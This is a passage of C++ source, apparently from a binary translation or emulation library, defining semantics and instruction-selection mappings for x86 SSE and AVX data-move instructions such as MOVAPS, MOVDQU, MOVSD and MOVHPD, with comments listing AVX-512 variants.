MOVxPS<MV128W, VV128>; DEF_ISEL(VMOVAPS_XMMdq_XMMdq_29) = MOVxPS<VV128W, VV128>; DEF_ISEL(VMOVAPS_YMMqq_MEMqq) = MOVxPS<VV256W, MV256>; DEF_ISEL(VMOVAPS_YMMqq_YMMqq_28) = MOVxPS<VV256W, VV256>; DEF_ISEL(VMOVAPS_MEMqq_YMMqq) = MOVxPS<MV256W, VV256>; DEF_ISEL(VMOVAPS_YMMqq_YMMqq_29) = MOVxPS<VV256W, VV256>; # if HAS_FEATURE_AVX512 //4102 VMOVAPS VMOVAPS_ZMMf32_MASKmskw_ZMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX //4103 VMOVAPS VMOVAPS_ZMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT //4104 VMOVAPS VMOVAPS_ZMMf32_MASKmskw_ZMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX //4105 VMOVAPS VMOVAPS_MEMf32_MASKmskw_ZMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT //4106 VMOVAPS VMOVAPS_XMMf32_MASKmskw_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX //4107 VMOVAPS VMOVAPS_XMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT //4108 VMOVAPS VMOVAPS_XMMf32_MASKmskw_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX //4109 VMOVAPS VMOVAPS_MEMf32_MASKmskw_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT //4110 VMOVAPS VMOVAPS_YMMf32_MASKmskw_YMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX //4111 VMOVAPS VMOVAPS_YMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT //4112 VMOVAPS VMOVAPS_YMMf32_MASKmskw_YMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX //4113 VMOVAPS VMOVAPS_MEMf32_MASKmskw_YMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT # endif // HAS_FEATURE_AVX512 #endif // HAS_FEATURE_AVX DEF_ISEL(MOVNTPS_MEMdq_XMMps) = MOVxPS<MV128W, V128>; #if HAS_FEATURE_AVX DEF_ISEL(VMOVNTPS_MEMdq_XMMdq) = MOVxPS<MV128W, VV128>; DEF_ISEL(VMOVNTPS_MEMqq_YMMqq) = MOVxPS<MV256W, VV256>; # if HAS_FEATURE_AVX512 //6168 VMOVNTPS VMOVNTPS_MEMf32_ZMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT //6169 VMOVNTPS VMOVNTPS_MEMf32_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT //6170 VMOVNTPS VMOVNTPS_MEMf32_YMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT # endif // HAS_FEATURE_AVX512 #endif // HAS_FEATURE_AVX DEF_ISEL(MOVUPS_XMMps_MEMps) = MOVxPS<V128W, MV128>; DEF_ISEL(MOVUPS_XMMps_XMMps_0F10) = MOVxPS<V128W, V128>; DEF_ISEL(MOVUPS_MEMps_XMMps) = MOVxPS<MV128W, V128>; DEF_ISEL(MOVUPS_XMMps_XMMps_0F11) = MOVxPS<V128W, V128>; #if HAS_FEATURE_AVX DEF_ISEL(VMOVUPS_XMMdq_MEMdq) = MOVxPS<VV128W, MV128>; DEF_ISEL(VMOVUPS_XMMdq_XMMdq_10) = MOVxPS<VV128W, VV128>; DEF_ISEL(VMOVUPS_MEMdq_XMMdq) = MOVxPS<MV128W, VV128>; DEF_ISEL(VMOVUPS_XMMdq_XMMdq_11) = MOVxPS<VV128W, VV128>; DEF_ISEL(VMOVUPS_YMMqq_MEMqq) = MOVxPS<VV256W, MV256>; DEF_ISEL(VMOVUPS_YMMqq_YMMqq_10) = MOVxPS<VV256W, VV256>; DEF_ISEL(VMOVUPS_MEMqq_YMMqq) = MOVxPS<MV256W, VV256>; DEF_ISEL(VMOVUPS_YMMqq_YMMqq_11) = MOVxPS<VV256W, VV256>; # if HAS_FEATURE_AVX512 //4954 VMOVUPS VMOVUPS_ZMMf32_MASKmskw_ZMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX //4955 VMOVUPS VMOVUPS_ZMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION //4956 VMOVUPS VMOVUPS_ZMMf32_MASKmskw_ZMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX //4957 VMOVUPS VMOVUPS_MEMf32_MASKmskw_ZMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION //4958 VMOVUPS VMOVUPS_XMMf32_MASKmskw_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX //4959 VMOVUPS VMOVUPS_XMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION //4960 VMOVUPS VMOVUPS_XMMf32_MASKmskw_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX //4961 VMOVUPS VMOVUPS_MEMf32_MASKmskw_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION //4962 VMOVUPS VMOVUPS_YMMf32_MASKmskw_YMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX //4963 VMOVUPS VMOVUPS_YMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION //4964 VMOVUPS VMOVUPS_YMMf32_MASKmskw_YMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX //4965 VMOVUPS VMOVUPS_MEMf32_MASKmskw_YMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION # endif // HAS_FEATURE_AVX512 #endif // HAS_FEATURE_AVX DEF_ISEL(MOVAPD_XMMpd_MEMpd) = MOVxPD<V128W, MV128>; DEF_ISEL(MOVAPD_XMMpd_XMMpd_0F28) = MOVxPD<V128W, V128>; DEF_ISEL(MOVAPD_MEMpd_XMMpd) = MOVxPD<MV128W, V128>; DEF_ISEL(MOVAPD_XMMpd_XMMpd_0F29) = MOVxPD<V128W, V128>; #if HAS_FEATURE_AVX DEF_ISEL(VMOVAPD_XMMdq_MEMdq) = MOVxPD<VV128W, MV128>; DEF_ISEL(VMOVAPD_XMMdq_XMMdq_28) = MOVxPD<VV128W, VV128>; DEF_ISEL(VMOVAPD_MEMdq_XMMdq) = MOVxPD<MV128W, VV128>; DEF_ISEL(VMOVAPD_XMMdq_XMMdq_29) = MOVxPD<VV128W, VV128>; DEF_ISEL(VMOVAPD_YMMqq_MEMqq) = MOVxPD<VV256W, MV256>; DEF_ISEL(VMOVAPD_YMMqq_YMMqq_28) = MOVxPD<VV256W, VV256>; DEF_ISEL(VMOVAPD_MEMqq_YMMqq) = MOVxPD<MV256W, VV256>; DEF_ISEL(VMOVAPD_YMMqq_YMMqq_29) = MOVxPD<VV256W, VV256>; # if HAS_FEATURE_AVX512 //5585 VMOVAPD VMOVAPD_ZMMf64_MASKmskw_ZMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX //5586 VMOVAPD VMOVAPD_ZMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT //5587 VMOVAPD VMOVAPD_ZMMf64_MASKmskw_ZMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX //5588 VMOVAPD VMOVAPD_MEMf64_MASKmskw_ZMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT //5589 VMOVAPD VMOVAPD_XMMf64_MASKmskw_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX //5590 VMOVAPD VMOVAPD_XMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT //5591 VMOVAPD VMOVAPD_XMMf64_MASKmskw_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX //5592 VMOVAPD VMOVAPD_MEMf64_MASKmskw_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT //5593 VMOVAPD VMOVAPD_YMMf64_MASKmskw_YMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX //5594 VMOVAPD VMOVAPD_YMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT //5595 VMOVAPD VMOVAPD_YMMf64_MASKmskw_YMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX //5596 VMOVAPD VMOVAPD_MEMf64_MASKmskw_YMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION REQUIRES_ALIGNMENT # endif // HAS_FEATURE_AVX512 #endif // HAS_FEATURE_AVX DEF_ISEL(MOVNTPD_MEMdq_XMMpd) = MOVxPD<MV128W, V128>; #if HAS_FEATURE_AVX DEF_ISEL(VMOVNTPD_MEMdq_XMMdq) = MOVxPD<MV128W, VV128>; DEF_ISEL(VMOVNTPD_MEMqq_YMMqq) = MOVxPD<MV256W, VV256>; # if HAS_FEATURE_AVX512 //6088 VMOVNTPD VMOVNTPD_MEMf64_ZMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT //6089 VMOVNTPD VMOVNTPD_MEMf64_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT //6090 VMOVNTPD VMOVNTPD_MEMf64_YMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: AVX_REQUIRES_ALIGNMENT DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT # endif // HAS_FEATURE_AVX512 #endif // HAS_FEATURE_AVX DEF_ISEL(MOVUPD_XMMpd_MEMpd) = MOVxPD<V128W, MV128>; DEF_ISEL(MOVUPD_XMMpd_XMMpd_0F10) = MOVxPD<V128W, V128>; DEF_ISEL(MOVUPD_MEMpd_XMMpd) = MOVxPD<MV128W, V128>; DEF_ISEL(MOVUPD_XMMpd_XMMpd_0F11) = MOVxPD<V128W, V128>; #if HAS_FEATURE_AVX DEF_ISEL(VMOVUPD_XMMdq_MEMdq) = MOVxPD<VV128W, MV128>; DEF_ISEL(VMOVUPD_XMMdq_XMMdq_10) = MOVxPD<VV128W, VV128>; DEF_ISEL(VMOVUPD_MEMdq_XMMdq) = MOVxPD<MV128W, VV128>; DEF_ISEL(VMOVUPD_XMMdq_XMMdq_11) = MOVxPD<VV128W, VV128>; DEF_ISEL(VMOVUPD_YMMqq_MEMqq) = MOVxPD<VV256W, MV256>; DEF_ISEL(VMOVUPD_YMMqq_YMMqq_10) = MOVxPD<VV256W, VV256>; DEF_ISEL(VMOVUPD_MEMqq_YMMqq) = MOVxPD<MV256W, VV256>; DEF_ISEL(VMOVUPD_YMMqq_YMMqq_11) = MOVxPD<VV256W, VV256>; # if HAS_FEATURE_AVX512 //4991 VMOVUPD VMOVUPD_ZMMf64_MASKmskw_ZMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX //4992 VMOVUPD VMOVUPD_ZMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION //4993 VMOVUPD VMOVUPD_ZMMf64_MASKmskw_ZMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: MASKOP_EVEX //4994 VMOVUPD VMOVUPD_MEMf64_MASKmskw_ZMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION //4995 VMOVUPD VMOVUPD_XMMf64_MASKmskw_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX //4996 VMOVUPD VMOVUPD_XMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION //4997 VMOVUPD VMOVUPD_XMMf64_MASKmskw_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: MASKOP_EVEX //4998 VMOVUPD VMOVUPD_MEMf64_MASKmskw_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION //4999 VMOVUPD VMOVUPD_YMMf64_MASKmskw_YMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX //5000 VMOVUPD VMOVUPD_YMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION //5001 VMOVUPD VMOVUPD_YMMf64_MASKmskw_YMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: MASKOP_EVEX //5002 VMOVUPD VMOVUPD_MEMf64_MASKmskw_YMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM MASKOP_EVEX MEMORY_FAULT_SUPPRESSION # endif // HAS_FEATURE_AVX512 #endif // HAS_FEATURE_AVX DEF_ISEL(MOVNTDQ_MEMdq_XMMdq) = MOVDQx<MV128W, V128>; DEF_ISEL(MOVNTDQA_XMMdq_MEMdq) = MOVDQx<V128W, MV128>; DEF_ISEL(MOVDQU_XMMdq_MEMdq) = MOVDQx<V128W, MV128>; DEF_ISEL(MOVDQU_XMMdq_XMMdq_0F6F) = MOVDQx<V128W, V128>; DEF_ISEL(MOVDQU_MEMdq_XMMdq) = MOVDQx<MV128W, V128>; DEF_ISEL(MOVDQU_XMMdq_XMMdq_0F7F) = MOVDQx<V128W, V128>; #if HAS_FEATURE_AVX DEF_ISEL(VMOVNTDQ_MEMdq_XMMdq) = MOVDQx<MV128W, V128>; DEF_ISEL(VMOVNTDQ_MEMqq_YMMqq) = MOVDQx<MV256W, VV256>; //5061 VMOVNTDQ VMOVNTDQ_MEMu32_ZMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT //5062 VMOVNTDQ VMOVNTDQ_MEMu32_XMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT //5063 VMOVNTDQ VMOVNTDQ_MEMu32_YMMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT DEF_ISEL(VMOVNTDQA_XMMdq_MEMdq) = MOVDQx<VV128W, MV128>; DEF_ISEL(VMOVNTDQA_YMMqq_MEMqq) = MOVDQx<VV256W, MV256>; //4142 VMOVNTDQA VMOVNTDQA_ZMMu32_MEMu32_AVX512 DATAXFER AVX512EVEX AVX512F_512 ATTRIBUTES: DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT //4143 VMOVNTDQA VMOVNTDQA_XMMu32_MEMu32_AVX512 DATAXFER AVX512EVEX AVX512F_128 ATTRIBUTES: DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT //4144 VMOVNTDQA VMOVNTDQA_YMMu32_MEMu32_AVX512 DATAXFER AVX512EVEX AVX512F_256 ATTRIBUTES: DISP8_FULLMEM NOTSX REQUIRES_ALIGNMENT DEF_ISEL(VMOVDQU_XMMdq_MEMdq) = MOVDQx<VV128W, MV128>; DEF_ISEL(VMOVDQU_XMMdq_XMMdq_6F) = MOVDQx<VV128W, VV128>; DEF_ISEL(VMOVDQU_MEMdq_XMMdq) = MOVDQx<MV128W, VV128>; DEF_ISEL(VMOVDQU_XMMdq_XMMdq_7F) = MOVDQx<VV128W, VV128>; DEF_ISEL(VMOVDQU_YMMqq_MEMqq) = MOVDQx<VV256W, MV256>; DEF_ISEL(VMOVDQU_YMMqq_YMMqq_6F) = MOVDQx<VV256W, VV256>; DEF_ISEL(VMOVDQU_MEMqq_YMMqq) = MOVDQx<MV256W, VV256>; DEF_ISEL(VMOVDQU_YMMqq_YMMqq_7F) = MOVDQx<VV256W, VV256>; #endif // HAS_FEATURE_AVX DEF_ISEL(MOVDQA_MEMdq_XMMdq) = MOVDQx<MV128W, V128>; DEF_ISEL(MOVDQA_XMMdq_XMMdq_0F7F) = MOVDQx<V128W, V128>; DEF_ISEL(MOVDQA_XMMdq_MEMdq) = MOVDQx<V128W, MV128>; DEF_ISEL(MOVDQA_XMMdq_XMMdq_0F6F) = MOVDQx<V128W, V128>; #if HAS_FEATURE_AVX DEF_ISEL(VMOVDQA_XMMdq_MEMdq) = MOVDQx<VV128W, MV128>; DEF_ISEL(VMOVDQA_XMMdq_XMMdq_6F) = MOVDQx<VV128W, VV128>; DEF_ISEL(VMOVDQA_MEMdq_XMMdq) = MOVDQx<MV128W, VV128>; DEF_ISEL(VMOVDQA_XMMdq_XMMdq_7F) = MOVDQx<VV128W, VV128>; DEF_ISEL(VMOVDQA_YMMqq_MEMqq) = MOVDQx<VV256W, MV256>; DEF_ISEL(VMOVDQA_YMMqq_YMMqq_6F) = MOVDQx<VV256W, VV256>; DEF_ISEL(VMOVDQA_MEMqq_YMMqq) = MOVDQx<MV256W, VV256>; DEF_ISEL(VMOVDQA_YMMqq_YMMqq_7F) = MOVDQx<VV256W, VV256>; #endif // HAS_FEATURE_AVX DEF_ISEL(MOVLPS_MEMq_XMMps) = MOVLPS<MV64W, V128>; DEF_ISEL(MOVLPS_XMMq_MEMq) = MOVLPS<V128W, MV64>; IF_AVX(DEF_ISEL(VMOVLPS_MEMq_XMMq) = MOVLPS<MV64W, VV128>;) IF_AVX(DEF_ISEL(VMOVLPS_XMMdq_XMMdq_MEMq) = VMOVLPS;) DEF_ISEL(MOVHLPS_XMMq_XMMq) = MOVHLPS; IF_AVX(DEF_ISEL(VMOVHLPS_XMMdq_XMMq_XMMq) = VMOVHLPS;) IF_AVX(DEF_ISEL(VMOVHLPS_XMMdq_XMMdq_XMMdq) = VMOVHLPS;) DEF_ISEL(MOVLHPS_XMMq_XMMq) = MOVLHPS; IF_AVX(DEF_ISEL(VMOVLHPS_XMMdq_XMMq_XMMq) = VMOVLHPS;) IF_AVX(DEF_ISEL(VMOVLHPS_XMMdq_XMMdq_XMMdq) = VMOVLHPS;) #if HAS_FEATURE_AVX # if HAS_FEATURE_AVX512 //4606 VMOVLPS DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES: DISP8_TUPLE2 //4607 VMOVLPS VMOVLPS_MEMf32_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES: DISP8_TUPLE2 # endif // HAS_FEATURE_AVX512 #endif // HAS_FEATURE_AVX DEF_ISEL(MOVLPD_XMMsd_MEMq) = MOVLPD<V128W, MV64>; DEF_ISEL(MOVLPD_MEMq_XMMsd) = MOVLPD<MV64W, V128>; IF_AVX(DEF_ISEL(VMOVLPD_MEMq_XMMq) = MOVLPD<MV64W, VV128>;) IF_AVX(DEF_ISEL(VMOVLPD_XMMdq_XMMdq_MEMq) = VMOVLPD;) #if HAS_FEATURE_AVX # if HAS_FEATURE_AVX512 //4599 VMOVLPD VMOVLPD_XMMf64_XMMf64_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES: DISP8_SCALAR //4600 VMOVLPD VMOVLPD_MEMf64_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES: DISP8_SCALAR # endif // HAS_FEATURE_AVX512 #endif // HAS_FEATURE_AVX namespace { template <typename D, typename S> DEF_SEM(MOVSD_MEM, D dst, S src) { FWriteV64(dst, FExtractV64(FReadV64(src), 0)); return memory; } DEF_SEM(MOVSD, V128W dst, V128 src) { FWriteV64(dst, FInsertV64(FReadV64(dst), 0, FExtractV64(FReadV64(src), 0))); return memory; } #if HAS_FEATURE_AVX // Basically the same as `VMOVLPD`. DEF_SEM(VMOVSD, VV128W dst, V128 src1, V128 src2) { FWriteV64(dst, FInsertV64(FReadV64(src2), 1, FExtractV64(FReadV64(src1), 1))); return memory; } #endif // HAS_FEATURE_AVX } // namespace DEF_ISEL(MOVSD_XMM_XMMsd_XMMsd_0F10) = MOVSD; DEF_ISEL(MOVSD_XMM_XMMdq_MEMsd) = MOVSD_MEM<V128W, MV64>; DEF_ISEL(MOVSD_XMM_MEMsd_XMMsd) = MOVSD_MEM<MV64W, V128>; DEF_ISEL(MOVSD_XMM_XMMsd_XMMsd_0F11) = MOVSD; #if HAS_FEATURE_AVX DEF_ISEL(VMOVSD_XMMdq_MEMq) = MOVSD_MEM<VV128W, MV64>; DEF_ISEL(VMOVSD_MEMq_XMMq) = MOVSD_MEM<MV64W, VV128>; DEF_ISEL(VMOVSD_XMMdq_XMMdq_XMMq_10) = VMOVSD; DEF_ISEL(VMOVSD_XMMdq_XMMdq_XMMq_11) = VMOVSD; # if HAS_FEATURE_AVX512 //3632 VMOVSD VMOVSD_XMMf64_MASKmskw_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_SCALAR ATTRIBUTES: DISP8_SCALAR MASKOP_EVEX MEMORY_FAULT_SUPPRESSION SIMD_SCALAR //3633 VMOVSD VMOVSD_MEMf64_MASKmskw_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_SCALAR ATTRIBUTES: DISP8_SCALAR MASKOP_EVEX MEMORY_FAULT_SUPPRESSION SIMD_SCALAR //3634 VMOVSD VMOVSD_XMMf64_MASKmskw_XMMf64_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_SCALAR ATTRIBUTES: MASKOP_EVEX SIMD_SCALAR //3635 VMOVSD VMOVSD_XMMf64_MASKmskw_XMMf64_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_SCALAR ATTRIBUTES: MASKOP_EVEX SIMD_SCALAR # endif // HAS_FEATURE_AVX512 #endif // HAS_FEATURE_AVX DEF_ISEL(MOVNTSD_MEMq_XMMq) = MOVSD_MEM<MV64W, V128>; namespace { template <typename D, typename S> DEF_SEM(MOVSS_MEM, D dst, S src) { FWriteV32(dst, FExtractV32(FReadV32(src), 0)); return memory; } DEF_SEM(MOVSS, V128W dst, V128 src) { FWriteV32(dst, FInsertV32(FReadV32(dst), 0, FExtractV32(FReadV32(src), 0))); return memory; } #if HAS_FEATURE_AVX DEF_SEM(VMOVSS, VV128W dst, V128 src1, V128 src2) { FWriteV32(dst, FInsertV32(FReadV32(src1), 0, FExtractV32(FReadV32(src2), 0))); return memory; } #endif // HAS_FEATURE_AVX } // namespace DEF_ISEL(MOVSS_XMMdq_MEMss) = MOVSS_MEM<V128W, MV32>; DEF_ISEL(MOVSS_MEMss_XMMss) = MOVSS_MEM<MV32W, V128>; DEF_ISEL(MOVSS_XMMss_XMMss_0F10) = MOVSS; DEF_ISEL(MOVSS_XMMss_XMMss_0F11) = MOVSS; #if HAS_FEATURE_AVX DEF_ISEL(VMOVSS_XMMdq_MEMd) = MOVSS_MEM<VV128W, MV32>; DEF_ISEL(VMOVSS_MEMd_XMMd) = MOVSS_MEM<MV32W, V128>; DEF_ISEL(VMOVSS_XMMdq_XMMdq_XMMd_10) = VMOVSS; DEF_ISEL(VMOVSS_XMMdq_XMMdq_XMMd_11) = VMOVSS; # if HAS_FEATURE_AVX512 //3650 VMOVSS VMOVSS_XMMf32_MASKmskw_MEMf32_AVX512 DATAXFER AVX512EVEX AVX512F_SCALAR ATTRIBUTES: DISP8_SCALAR MASKOP_EVEX MEMORY_FAULT_SUPPRESSION SIMD_SCALAR //3651 VMOVSS VMOVSS_MEMf32_MASKmskw_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_SCALAR ATTRIBUTES: DISP8_SCALAR MASKOP_EVEX MEMORY_FAULT_SUPPRESSION SIMD_SCALAR //3652 VMOVSS VMOVSS_XMMf32_MASKmskw_XMMf32_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_SCALAR ATTRIBUTES: MASKOP_EVEX SIMD_SCALAR //3653 VMOVSS VMOVSS_XMMf32_MASKmskw_XMMf32_XMMf32_AVX512 DATAXFER AVX512EVEX AVX512F_SCALAR ATTRIBUTES: MASKOP_EVEX SIMD_SCALAR # endif // HAS_FEATURE_AVX512 #endif // HAS_FEATURE_AVX DEF_ISEL(MOVNTSS_MEMd_XMMd) = MOVSS_MEM<MV32W, V128>; namespace { DEF_SEM(MOVHPD, V128W dst, MV64 src) { FWriteV64(dst, FInsertV64(FReadV64(dst), 1, FExtractV64(FReadV64(src), 0))); return memory; } DEF_SEM(MOVHPD_STORE, MV64W dst, V128 src) { FWriteV64(dst, FExtractV64(FReadV64(src), 1)); return memory; } #if HAS_FEATURE_AVX DEF_SEM(VMOVHPD, VV256W dst, V128 src1, MV64 src2) { FWriteV64(dst, FInsertV64(FReadV64(src1), 1, FExtractV64(FReadV64(src2), 0))); return memory; } #endif // HAS_FEATURE_AVX } // namespace DEF_ISEL(MOVHPD_XMMsd_MEMq) = MOVHPD; DEF_ISEL(MOVHPD_MEMq_XMMsd) = MOVHPD_STORE; IF_AVX(DEF_ISEL(VMOVHPD_XMMdq_XMMq_MEMq) = VMOVHPD;) IF_AVX(DEF_ISEL(VMOVHPD_MEMq_XMMdq) = MOVHPD_STORE;) //5181 VMOVHPD VMOVHPD_XMMf64_XMMf64_MEMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES: DISP8_SCALAR //5182 VMOVHPD VMOVHPD_MEMf64_XMMf64_AVX512 DATAXFER AVX512EVEX AVX512F_128N ATTRIBUTES: DISP8_SCALAR namespace { DEF_SEM(MOVHPS, V128W dst, MV64 src) { auto dst_vec = FReadV32(dst); auto src_vec = FReadV32(src); auto low_entry = FExtractV32(src_vec, 0); auto high_entry = FExtractV32(src_vec, 1); FWriteV32(dst, FInsertV32(FInsertV32(dst_vec, 2, low_entry), 3, high_entry)); return memory; } DEF_SEM(MOVHPS_STORE, MV64W dst, V128 src) { auto dst_vec = 